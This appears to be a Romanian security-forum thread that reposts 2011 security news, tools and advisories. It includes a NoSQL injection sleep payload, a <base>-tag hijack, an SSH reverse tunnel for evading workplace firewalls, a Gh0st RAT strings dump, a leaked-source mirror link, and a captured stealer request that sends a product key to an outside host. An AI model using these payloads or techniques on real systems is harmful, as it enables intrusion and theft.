Nytro

[h=1]SSLyze: A Fast and Full-Featured SSL Scanner![/h]by Mayuresh on December 21, 2011 When we wrote the “list of SSL scanners for penetration testers” post, in August this year, little did we know that we would have to update it this soon. We have since updated the list with SSLyze, a fast and full featured SSL scanner. It is brought to us by the iSEC Partners. SSLyze is a stand-alone Python application that looks for classic SSL mis-configurations, while providing the advanced user with the opportunity to customize the application via a simple plugin interface. This open source, cross-platform tool will help you with analyzing the configuration of SSL servers and for identifying mis-configurations such as the use of outdated protocol versions, weak hash algorithms in trust chains, insecure renegotiation, and session resumption settings. [h=2]Features of SSLyze:[/h] Insecure renegotiation testing Scanning for weak strength ciphers Checking for SSLv2, SSLv3 and TLSv1 versions Server certificate information dump and basic validation Session resumption capabilities and actual resumption rate measurement Support for client certificate authentication Simultaneous scanning of multiple servers, versions and ciphers For example, SSLyze can help user’s identify server configurations vulnerable to THC’s recently released SSL DOS attack, by checking the server’s support for client-initiated re-negotiations. As we have already mentioned, it is cross-platform. It supports 64-bit and 32-bit Windows and Linux operating systems. All it needs is the following sets of packages: Windows: Python 2.6 or 2.7 and OpenSSL 1.0.0c Linux: Python 2.6 or 2.7 and OpenSSL 0.9.8+ [h=3]Install SSLyze:[/h] # yum install python26 openssl # wget http://sslyze.googlecode.com/files/sslyze-0.3_src.zip # unzip sslyze-0.3_src.zip # cd sslyze-0.3_src [h=3]SSLyze usage:[/h] $ python sslyze.py [options] www.target1.com www.target2.com:443 It supports the following options to provide a granular control: Regular Scan “–regular“: Performs a regular scan. It’s a shortcut for –sslv2 –sslv3 –tlsv1 –reneg –resum –certinfo=basic. OpenSSL Cipher Suites “–sslv2“, “–sslv3“, “–tlsv1“: Lists the SSL 2.0 / SSL 3.0 / TLS 1.0 OpenSSL cipher suites supported by the server. Session Renegotiation “–reneg“: Checks whether the server is vulnerable to insecure renegotiation. Session Resumption “–resum“: Tests the server for session resumption support, using both session IDs and TLS session tickets (RFC 5077). Session Resumption Rate “–resum_rate“: Estimates the average rate of successful session resumptions by performing 100 session resumptions. Server Certificate “–certinfo=basic“: Verifies the server’s certificate validity against Mozilla’s trusted root store, and prints relevant fields of the certificate. Additional options providing client certificate support and connection timeout variables are also available. [h=3]Download SSLyze:[/h] SSLyze v0.3 – sslyze-0.3_src.zip – Downloads - sslyze - Fast and Full-Featured SSL Scanner - Google Project Hosting Sursa: SSLyze: A Fast and Full-Featured SSL Scanner! — PenTestIT

Reversing Microsoft patches to reveal vulnerable code Harsimran Walia Computer Security Enthusiast The paper would try to reveal the vulnerable code for a particular disclosed vulnerability, which is the first and foremost step for making undisclosed exploit and patch verification. The process used herein could be used to create vulnerability based signatures which are far better than exploit signatures. Vulnerability signature is a superset of all the inputs satisfying a particular vulnerability condition whereas exploit based signature would only cater to one type of input satisfying that vulnerability condition. This paper would try to pin point the vulnerable code and the files in Microsoft products by reverse engineering the Microsoft patches. The method used would be to take a binary difference of the file which was patched taken at two different instances, one is the most recent file before patching and the second is after applying the patch but finding the two files is in itself another problem. Windows now releases two different versions of patches, GDR (General distribution) which contains only security related updates and the other QFE (Quick Fix Engineering) or LDR (Limited Distribution Release) which has both security related and functional updates. The problem addressed is that the versions of the two files to be compared should match that is either both should be GDR or LDR. The file after patching can be obtained by extracting the patch of the considered vulnerability. The second file to be compared with a matching version with the first one could be extracted from some other vulnerability patch addressing the issue with the same software disclosed just before the vulnerability considered. The process of extraction of files from patches differs in Vista and Windows 7 from the traditional way used in Windows XP. After obtaining the correct files to be compared, the next step would be to get a binary difference between the files which can be done very easily and effectively with the use of a tool called DarunGrim. The tool provides a well illustrated difference between the subroutines in the term of percentage match between them. Subroutines from both the files can be viewed in graph mode and can be compared to find the vulnerability. The change in the code is done to fix that particular vulnerability which may be removal of a piece of code and addition of another. Another problem arises at this point is that compiler optimizations happen every-time a code is compiled, so if both the files are compiled with different compilers or compiler versions, they would have different compiler optimizations and that would also show up as a change in code. Simple Instruction reordering keeps happening over different releases which give rise to another problem as when only the instructions are reordered, still it would show up as changed code. The code change in one of the functions out of several functions in the file before applying the patch would be the vulnerable code. From here knowledge of the reverse engineer would come into play as how effectively and fast he can find the vulnerability from the code shown as being changed from the previous file. Till now the process used was static analysis but from now onwards dynamic analysis would be used as breakpoints could be set at these changed functions and run the software. When a breakpoint is hit we can check in which of the functions is user input being dealt. Obtaining all this information can then be used to write an exploit. This process of reversing the patch and finding the details about the vulnerability would definitely help in creating vulnerability signatures. Download: http://nullcon.net/nullcon2011presentation/harsimranwalia_nullcon.pdf

[h=1]libemu – x86 Shellcode Emulation[/h] libemu is a small library written in C offering basic x86 emulation and shellcode detection using GetPC heuristics. It is designed to be used within network intrusion/prevention detections and honeypots. libemu supports: Executing x86 instructions Reading x86 binary code Register emulation Basic FPU emulation [*]Shellcode execution Shellcode detection Using GetPC heuristics Static analysis Binary backwardstraversal [*]Win32 API hooking With libemu one can: Detect shellcodes Execute the shellcodes Profile shellcode behaviour Download: http://sourceforge.net/projects/nepenthes/files/libemu%20development/0.1.0/ Sursa si Info: libemu – x86 Shellcode Emulation

E util cand vezi niste sintaxe mai urate si iti e lene sa aranjezi codul sa il intelegi. (*(void(*)()) SC)();

Super, ceva in romana... Ceva in engleza: MEGAUPLOAD - The leading online storage and file delivery service

Nu ma pricep, dar parca trebuia (neaparat) sa ii faci jailbreak.

Iti recomand sa te axezi pe un singur limbaj, maixm 2: unul de programare - C++ si unul de scripting/Web - PHP. Dar si C#-ul e util daca vrei sa faci ceva rapid si usor. Bun venit.

Mail de cocalari: h4ck3r@expect-us.net Formular de contact fara CAPTCHA, probabil vulnerabil la CRLF: Contact Gramatica 1337: "Tutorialz" Meniu penibil facut cu cine stie ce porcarie: "Gooey Menu script" Design-ul inseamna niste tabele de faceam in clasa a IX-a. Pe scurt: rahat.

Ca sa dai submit, alege una dintre variantele: <form id="form" name="send" action="http://www.google.ro/" method="post"> <input type="text" name="2"/> <input name="buton" id="btn" type="submit" value="Submit" /> </form> <script> document.forms[0].submit(); document.send.submit(); document.getElementById("form").submit(); // Sau apesi butonul document.forms[0].buton.click(); document.send.buton.click(); document.getElementById("btn").click(); </script> Ca sa dai submit dupa 2 secunde: <script> // Functie care da submit function Dupa2Secunde() { document.forms[0].submit(); } // Apel dupa 2 secunde setInterval(Dupa2Secunde, 2000); </script>

Metasploit on Amazon Kindle December 18, 2011 Since Nmap and Ruby is working on Kindle (check my previous posts how I’ve done that), next step is Metasploit – of course! Let me tell you immediately, no patches to Metasploit needed. You can run full blown version of Metasploit with Kindle’s 256 MB of RAM, but dont’ expect miracles. Download http://ftp.linux.hr/kindle/ruby-1.9.3-p0-kindle-bin.tar.bz2 http://downloads.metasploit.com/data/releases/framework-latest.tar.bz2 Install Create opt directory and extract files there mkdir /mnt/us/opt && cd /mnt/us/opt tar xvjf ruby-1.9.3-p0-kindle.tar.bz2 tar xvjf framework-latest.tar.bz2 Test that you have following directory structures: /mnt/us/opt/msf/ /mnt/us/opt/ruby-1.9.3-p0/ export HOME=/mnt/us and run metasploit cd /mnt/us/opt/msf3/ ../ruby-1.9.3-p0/bin/ruby msfconsole I have made small script in /mnt/us/opt which starts msf, so I don’t have to do it every time. It’s straightforward: [INDENT] #!/bin/sh export HOME=/mnt/us cd /mnt/us/opt/msf ../ruby-1.9.3-p0/bin/ruby msfconsole [/INDENT] Let me know if it works for you! Sursa: Metasploit on Amazon Kindle

[h=1]Remove passwords and restrictions from secured PDF files[/h] PDFUnlock! is a free web site that removes restrictions from PDF files. Link: http://www.pdfunlock.com/ Nu stiu daca merge, incercati daca aveti nevoie.

[h=1]Download Firefox 9.0 Final for Linux[/h]December 20th, 2011, 07:35 GMT · By Marius Nestor Mozilla unofficially released last evening, December 19th, the highly anticipated Mozilla Firefox 9.0 web browser for Linux, Mac OS X and Windows operating systems. There's no official announcement yet, but the binary and source archives of the final version of Mozilla Firefox 9.0 were made available for download on the official FTP site of the Mozilla company. Highlights of Mozilla Firefox 9.0: · Added Type Inference, radically improving the JavaScript performance; · Do Not Track status can now be queried via JavaScript; · font-stretch support was added; · text-overflow support was improved; · HTML5, CSS, and MathML support was improved; · Various stability issues were fixed. Download Firefox 9.0 for Linux binaries and sources right now from Softpedia. Also, don't forget to visit our always up-to-date Firefox Extensions section for the latest add-ons! Download: http://linux.softpedia.com/get/Internet/HTTP-WWW-/Mozilla-Firefox-8-20864.shtml Sursa: Download Firefox 9.0 Final for Linux - Softpedia

[h=1]Attacking NoSQL and Node.js: Server-Side JavaScript Injection (SSJS)[/h] Jeff Darcy has written a while back about the (lack of) security in NoSQL database. Unfortunately things haven’t changed much and if you check the NoSQL + Node.js applications I’ve posted lately you’ll notice that some of them are completely ignoring security. And there are some people realizing the risks and starting to express their concerns: Playing with MongoDB lately, I’m getting scared. Because I’m seeing some really bad practices out there. Seeing it in live code. In tutorials. Bryan Sullivan (Senior Security Researcher, Adobe Secure Software Engineering Team) has published a paper (PDF) explaining some of the possible server-side JavaScript injection attacks and the risks the apps and the data are exposed to. Teaser: he can do pretty much everything. It should be noted that exploitation of server-side JavaScript injection vulnerabilities is more like that of SQL injection than of cross-site scripting. SSJS injection does not require any social engineering of an intermediate victim user the way that reflected XSS or DOM-based XSS do; instead, the attacker can attack the application directly with arbitrarily created HTTP requests. Because of this, defenses against SSJS injection are also similar to SQL injection defenses: Avoid creating “ad-hoc” JavaScript commands by concatenating script with user input. Validate user input used in SSJS commands with regular expressions. Avoid use of the JavaScript eval command. In particular, when parsing JSON input, use a safer alternative such as JSON.parse. Remember there’s no such thing as security through obscurity. Sursa: Attacking NoSQL and Node.js: Server-Side JavaScript Injection (SSJS) • myNoSQL

JPC is the fast pure Java™ x86 PC emulator Use JPC to boot virtual computers right here in your browser.... JPC creates a virtual computer upon which you can install your favorite operating system in a safe, flexible and powerful way. It aims to give you complete control over your favorite PC software's execution environment, whatever your real hardware or operating system, and JPC's multi-layered security makes it the safest solution for running the most dangerous software in quarantine - ideal for protecting your machine from malicious or unstable software. Read more about JPC - since it's launch at JavaOne 2007, JPC can now boot many more operating systems (including graphical linuxes) and it's much faster. Download: http://jpc.sourceforge.net/download_download.html Sursa: JPC

[h=1]Virtual Machine Security - VMware Security Hardening[/h]By Irfan Shakeel Virtual machines are very common in the enterprise and even for home user, most common virtual machines are VMware and virtual box in both machines security is an essential part. Security of a virtual machine is also important as the security of host machine. There are different Hardening tips are available for virtual machine (VMware) and in this article we will discuss the basic security tips for VMware. Virtualization is complex and there are many moving parts. I can not speak to all the details of hardening a VMware environment but I can speak to the minimum things to consider when installing or maintaining a VMware environment. For more advice, look at these documents: vSphere 4.0 Security Hardening Guide Security Configuration Benchmarks for VMware ESX 4 PCI DSS Virtualiztion Guidelines A Guide to Virtualization Hardening Guides [h=3]A Typical ESX Environment[/h] A typical ESX environment will have one or more ESX servers connected to a shared storage system such as a fiber channel or iSCSI SAN. Each ESX server will have one or more guest operating systems, each with VMware tools and a myriad of applications installed. This can be seen in the figure below: In this environment there are three major areas of concern: the storage system, the ESX servers, and the guest operating systems. [h=3]Storage Systems[/h] Four things to think about with storage systems are data availability, traffic isolation, the security levels of the ESX servers sharing the storage systems, and which ESX servers are allowed to see which data sets. [h=4]Data Availability[/h] Whatever storage system is used, fiber channel or iSCSI, ensure there are multiple data paths between the storage system and the ESX servers. This includes dual controllers on the SAN, dual switches, redundant power sources for the SAN, and dual host bus adapters (HBA) on the ESX server. It is not enough to have a single HBA with dual ports, two HBAs are necessary. Before the system goes into production, testing should be done to ensure a single device failure does not prevent the ESX server from accessing the data. [h=4]Traffic Isolation[/h] Traffic isolation is of particular concern in iSCSI systems because they use the same basic infrastructure as a standard network. All iSCSI traffic should be segmented from the rest of the network traffic to prevent an attacker from sniffing the iSCSI data. I am not a fan of using VLANs to segment traffic of differing security levels and always recommend physically segmenting iSCSI traffic from the rest of the network. [h=4]Shared Storage for ESX Servers with Differing Security Levels[/h] ESX servers in differing security levels are configured and maintained differently. An ESX server setup as a lab environment is not going to be hardened to the same level as an ESX server holding the companies production systems and those two ESX servers should not share the same storage. An attacker who gained access to the weaker ESX server could use it to attempt to gain access to the production data on the shared storage system. [h=4]Share Data Volumes with the Appropriate ESX Servers[/h] On a typical SAN, multiple data volumes are configured and each one is assigned a SCSI logical unit number (LUN), which is used to uniquely identify that volume. The SAN can then be configured to only allow specific HBAs to access specific LUNs. As an example, in a group of ESX servers only two of those servers may need access to the LUN that holds the HR data, the SAN should be configured so only the HBAs in those ESX servers have access to the LUN with HR data. [h=3]Conclusion[/h] As stated earlier there are three major areas of concern with a production VMware environment, the storage system, the ESX servers, and the guest operating systems. I will discuss the latter two in upcoming blog entries. For now, remember to configure and test multiple paths to the data on the storage system, to isolate iSCSI traffic from the rest of the network, to keep ESX servers of differing security levels from sharing the same storage system, and to only share data sets with the appropriate ESX servers. About the Author Stephen has over ten years experience in the information technology field working as a programmer, technical trainer, network operations manager, and information security consultant. He holds a Bachelor of Science in Math and a number of industry certifications, including the Certified Information Systems Security Professional(CISSP), Offensive Security Certified Professional(OSCP), and GIAC Penetration Tester(GPEN). Sursa: Virtual Machine Security - VMware Security Hardening | Ethical Hacking-Your Way To The World Of IT Security

Silly PoCs continue: X-Frame-Options give you less than expected From: Michal Zalewski <lcamtuf () coredump cx> Date: Fri, 16 Dec 2011 11:21:49 -0800 [ Resubmitting - I think the original post did not go through last week, but some of the responses did, so probably an accident. ] --- I think we greatly underappreciate the extent to which JavaScript allows you to exploit the limits of human perception. On modern high-performance systems, windows can be opened, positioned, and closed; and documents loaded and then navigated away from; so quickly that we can't even reliably notice that, let alone react consciously. The PoC I posted here earlier this week (Beaver Peak Banking and BBQ) demonstrates one example of page transitions occurring so fast that you don't register it; and some of my earlier posts outlined the exploitation of page switching to exploit browser UIs (e.g. http://lcamtuf.coredump.cx/ffgeo2/). Today, I wanted to share this brief demonstration of an attack that should hopefully illustrate why our current way of thinking about clickjacking (and the possible defenses, such as X-Frame-Options) is flawed: http://lcamtuf.coredump.cx/clickit/ The basic idea here is that instead of placing the UI you want to tamper with in an invisible or only partly-visible <iframe>, you can achieve a similar effect simply by predicting the time of a premeditated click (which is fairly easy if you look at mouse velocity and distance to the expected destination), and then either destroying the current window, or navigating to a different document (in this case, a cheesy banking site). While everything about this exploit is extremely goofy, and I put no effort into making the transitions less obvious, it should still demonstrate the issue neatly. /mz Sursa: Bugtraq: silly PoCs continue: X-Frame-Options give you less than expected

<BASE> tag used for hijacking external resources (XSS) From: Bouke van Laethem Date: Thu, 15 Dec 2011 23:53:26 +0100 I report this here because I could not find any other reference to this issue. VULNERABLE: Chrome, firefox and safari. NOT VULNERABLE: IE8 or IE9. (Above is as far as I could tell: things are moving fast nowadays in browser land) ISSUE: The <base> tag is parsed outside of <head></head>. This can lead to the base being reset, both before and after the <base> tag being injected, depending on browser types and versions. As a result, images and javascript can be loaded from an attackers domain, and forms and hyperlinks point to the attackers domain. An example can be found on http://avuko.net,'>http://avuko.net, but it is simple enough to reproduce: just put a <base href="http://attackerdomain";> somewhere in your HTML (the closer to <head> the better). Tested with overriding <img>, <a>, <script> & <form>, would probably work on other external references too. FIX/WORK-AROUND: make sure all paths are absolute. REFERENCES: http://www.w3.org/TR/html4/struct/links.html#h-12.4 http://avuko.net -- Be strict when sending and tolerant when receiving. [RFC 1958, 3.9] Sursa: Bugtraq: <BASE> tag used for hijacking external resources (XSS)

Bypassing NAT with client to client SSH connections Posted: December 19, 2011 in Guides Okay, well I know it’s been entirely too long since I’ve written anything here, and for those of you who know me personally you know I’ve had a very hectic schedule of late. Sorry for the delay in posting, also the Ubuntu 12.04 LTS desktop and server security guides have been delayed. I’m hoping to have at least one of them up after the holidays, but no promises. So to tithe you over for a little bit, and to get a new post up here, I’m going to discuss something that a lot of people ask about on Ubuntu Forums. It is against Ubuntu forums policy to instruct people how to bypass the security of a network they do not own. This however, is my personal blog and I will instruct whatever I want That being said, if you do this at work and get fired it’s your fault, most sysadmins will frown on this, and yes they will catch you. This is not really a new trick, but it will bypass NAT and allow you to have an always on SSH connection to an endpoint behind a NAT router (with no ports forwarded). This requires three systems. The endpoint (which is behind the firewall), the middleman, which is a machine you control somewhere on the internet, and the machine you want to ssh from (presumably your home machine or another system that you control). Note : For the purposes of this guide the following IP’s are used as a point of reference. Middleman : 192.168.0.15 Endpoint Behind Firewall : 172.16.128.4 Machine that you’re SSH’ing from : 192.168.0.14 So here we go. Setting up the Middle Man First things first, we need to install to install an openssh-server on our middleman and configure it as a gateway. Note : This is done on Ubuntu, change commands appropriately for your operating environment. sudo apt-get install openssh-server Now we want to edit /etc/ssh/sshd_config and add the following lines. GatewayPorts Yes TCPKeepAlive Yes This will keep our connections alive and allow us to tunnel through this system. Creating a Reverse Connection From the Endpoint Now on the endpoint machine (the one behind the firewall) we will create a reverse connection to our middleman server. This will bypass our firewall. We can automate this process by creating a cron job. However, if we do this we must use passwordless login with keys. I’m lazy so I didn’t generate keys here. ssh -R 31337:localhost:22 dangertux@192.168.0.15 What this does is create a reverse connection and tunnel to 192.168.0.15 Connect From Your Machine Now we connect to the middleman server from our machine. ssh -p 31337 dangertux@192.168.0.15 Note: the password you are prompted for will be the password of the user on the machine behind the firewall. There you go, an always on SSH client – client connection that bypasses NAT routing. Again, a friendly warning, a sysop will not take DT told me to as an excuse, besides I didn’t tell you to, I told you how Sursa: SSH Hacks : Bypassing NAT with client to client SSH connections

[h=3]FindBugs v.2.0 - Find Bugs in Java Programs[/h][h=2]Sunday, December 18, 2011 (d3v1l)[/h] A static analysis tool to find bugs in Java programs. FindBugs is an open source program created by Bill Pugh and David Hovemeyer which looks for bugs in Java code.It uses static analysis to identify hundreds of different potential types of errors in Java programs.FindBugs operates on Java bytecode,rather than source code.The software is distributed as a stand-alone GUI application. There are also plug-ins available for Eclipse,Netbeans,IntelliJ IDEA,and Hudson. First Look: FindBugs 2.0 Download: http://findbugs.sourceforge.net Sursa: Security-Shell: FindBugs v.2.0 - Find Bugs in Java Programs

HTML5 web security December 6th, 2011 Document Name: HTML5_Web_Security_v1.0.docx Version: v1.0 Author: Michael Schmidt, Compass Security AG Reviewer: Thomas Röthlisberger, Compass Security AG Date of Delivery: December 6th, 2011 Classification: Article Overview to HTML5 web security by Michael Schmidt [michael.schmidt-@-csnc.ch], reviewed by Thomas Röthlisberger [thomas.roethlisberger-@-csnc.ch] This article is an extract of the master thesis written by Michael Schmidt. The security relevant aspects of HTML5 that were considered in this thesis are covered in the subsequent document. It needs to be considered that the content of this document was released in May 2011. Compass Security makes regular updates to its HTML5 security know how and provides additional information. Please visit Compass Security AG - Switzerland or contact us for the most current version. Download: http://media.hacking-lab.com/hlnews/HTML5_Web_Security_v1.0.pdf

Time-Based Blind NoSQL Injection Authored by Felipe Aragon | Site syhunt.com Posted Dec 19, 2011 This is a brief write up discussing time-based NoSQL injection attacks using javascript. Time-Based Blind NoSQL Injection - Detecting server-side JavaScript injection vulnerabilities In July 2011, Bryan Sullivan, a senior security researcher at Adobe Systems, demonstrated server-side JavaScript injection vulnerabilities in web applications using MongoDB and other NoSQL database engines. He demonstrated how they could be used to perform Denial of Service, File System, Remote Command Execution, and many other attacks, including the easy extraction of the entire contents of the NoSQL database -- a blind NoSQL injection attack (paper here at https://media.blackhat.com/bh-us-11/Sullivan/BH_US_11_Sullivan_Server_Side_WP.pdf). We not only confirmed the published data about the NoSQL injection vulnerabilities, but also discovered that the MongoDB shell supports a sleep() function which makes time-based detection possible of vulnerable web applications. It is also possible to inject a custom sleep code, a technique that may be used to spot injection vulnerabilities in web applications using server-side JavaScript execution. This is not restricted to MongoDB. Below you can find two examples of NoSQL injection vulnerabilities in PHP that could be spotted using these techniques. Example 1: NoSQL Injection Vulnerability in PHP The following requests would make these (or similar) vulnerable web application sleep for 10 seconds: vulnerable.php?msg=1';sleep(10000);var%20foo='bar The MongoDB sleep() function works with milliseconds. Alternative technique using a custom sleep code: vulnerable.php?msg=1';var%20d%20=%20new%20Date();%20var%20cd%20=%20null;%20do%20{%20cd%20=%20new%20Date();%20}%20while(cd-d%20<%2010000);var%20foo='bar <? $mongo = new Mongo(); $db = $mongo->demo; $id = $_GET['id']; $js = "function() { var id = '$id'; SOME CODE... }"; $response = $db->execute($js); ... ?> Example 2: NoSQL Injection Vulnerability in PHP <? $mongo = new Mongo(); $db = $mongo->demo; $year = $_GET['year']; $collection = $db->demo; $query = 'function() {var search_year = \'' . $year . '\';' . 'return this.publicationYear == search_year || ' . ' this.filmingYear == search_year || ' . ' this.recordingYear == search_year;}'; $cursor = $collection->find(array('$where' => $query)); ... ?> Example 3: Sleep in JavaScript var date = new Date(); var curDate = null; do { curDate = new Date(); } while(curDate-date < 10000); // delay time (ms) Solution Always validate user input used in server-side JavaScript commands. Article by Felipe Aragon. Originally published at http://www.syhunt.com/?n=Articles.NoSQLInjection --- Copyright © 2010 Syhunt Security Disclaimer: The information in this article is provided "as is" without warranty of any kind. Details provided are strictly for educational and defensive purposes. Syhunt is not liable for any damages caused by direct or indirect use of the information provided by this article. Sursa: Time-Based Blind NoSQL Injection ? Packet Storm

[h=1]Oracle Solaris 11 Kernel Source Leaked[/h]December 19th, 2011, 14:00 GMT · By Marius Nestor As Phoronix announced a couple of minutes ago, it appears that a snapshot of the kernel source code for Oracle's Solaris 11 operating system has been leaked on major torrent and file hosting sites. Searching "solaris11.tar.bz2" on Google, Softpedia can also confirm that the bzip2 archive of about 104 MB contains the source code of Oracle Solaris 11's kernel. Being a closed source operating system, Oracle is probably trying right now to delete the leaked Solaris 11 kernel archive from aforementioned sites. The Oracle Corporation announced the Oracle Solaris 11 cloud operating system on November 9th, supporting the security, scalability and performance requirements of cloud-based deployments. Oracle Solaris 11 brings features like the ZFS filesystem, virtualization capabilities, comprehensive management, "secure by default" features, cloud-scale life cycle management, SPARC and x86 certified. Download Oracle Solaris 11 right now from Softpedia. Mirror: Download solaris11.tar.bz2 for free on uploading.com Sursa: Oracle Solaris 11 Kernel Source Leaked - Softpedia

[h=1]Analyzing malware using Sysinternals’ VMMap[/h]Posted by Chief Banana on December 19, 2011 In May 2011, Sysinternals released a new tool called ‘vmmap’. According to the website: ‘VMMap is a process virtual and physical memory analysis utility. It shows a breakdown of a process’s committed virtual memory types as well as the amount of physical memory (working set) assigned by the operating system to those types. Besides graphical representations of memory usage, VMMap also shows summary information and a detailed process memory map’. While analyzing a piece of malware for a chapter in a book, I discovered the great usage of this tool. I already identified that a suspicious connection was using the PID of 1040. Investigating the processes around this PID, it became clear that this PID belonged to one of the ‘svchost’ processes. Another interesting file that was used by this process was called ’6to4ex.dll’ Opening VMMap from a forencic cd-rom, the tools asked for the starting process. In this case I selected the option ‘ SVCHOST’ with the PID of 1040. Next the breakdown of this process committed virtual memory types and used files are visible. Under the svchost process overview, the ’6to4ex.dll’ file was also shown. Selecting this file and using the shortcut ‘CTRL+T’, which activates the strings view command, very interesting strings about this file became visible: The interesting strings about the malware used and capabilities: · ‘%s\shell\open\command · Gh0st Update · E:\gh0st\server\sys\i368\RESSDT.pdb · \??\RESSDTDOS · ?AVCScreenmanager · ?AVCScreenSpy · ?AVCKeyboardmanager · ?AVCShellmanager · ?AVCAudio · ?AVCAudiomanager · SetWindowsHookExA · CVideocap · Global\Gh0st %d · \cmd.exe By searching for more details around the term ‘Gh0st’ and backdoor it became clear that this might be a Chinese Remote Access Tool (RAT) that is common known to be used in targeted attacks. Features of this RAT are: capturing audio/video/keystrokes, remote shell, remote command, file-manager, spying the screen and many more. Definately VMMap will be part of my malware IR-kit Sursa: Analyzing malware using Sysinternals’ VMMap | securitybananas.com

NoScript detection with CSS <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <title>Test</title> </head> <iframe src="detection.html" width="180" id="testframe"></iframe> <script type="text/javascript"> document.getElementById("testframe").style.width = "400px"; </script> </html> detection.html: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <title>detection</title> <style type="text/css"> .active { display:none; } .notactive { display:block; } @media screen and (max-width: 200px) { .active { display:block; } .notactive { display:none; } } </style> </head> <body> <div class="active">Noscript is active</div> <div class="notactive">Noscript is not active</div> </body> </html> Sursa: Test Tricky...

GET /steler/index.php?action=add&a=4&c=JOHN-66E06C37B1&u=-&l=Microsoft Windows XP Professional&p=VGBRV-X2DDM-JYDFW-22MQW-3G39Y HTTP/1.1 Accept: */* Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022) Host: www.cruciatii.in Connection: Keep-Alive @alexbest Ban permanent. Daca doriti sa discutati cu el: cs.alexbest @ IM E din Stefanesti, probabil e de la tara, deci na... Deci programul e de fapt Stealer de Firefox si probabil si altele.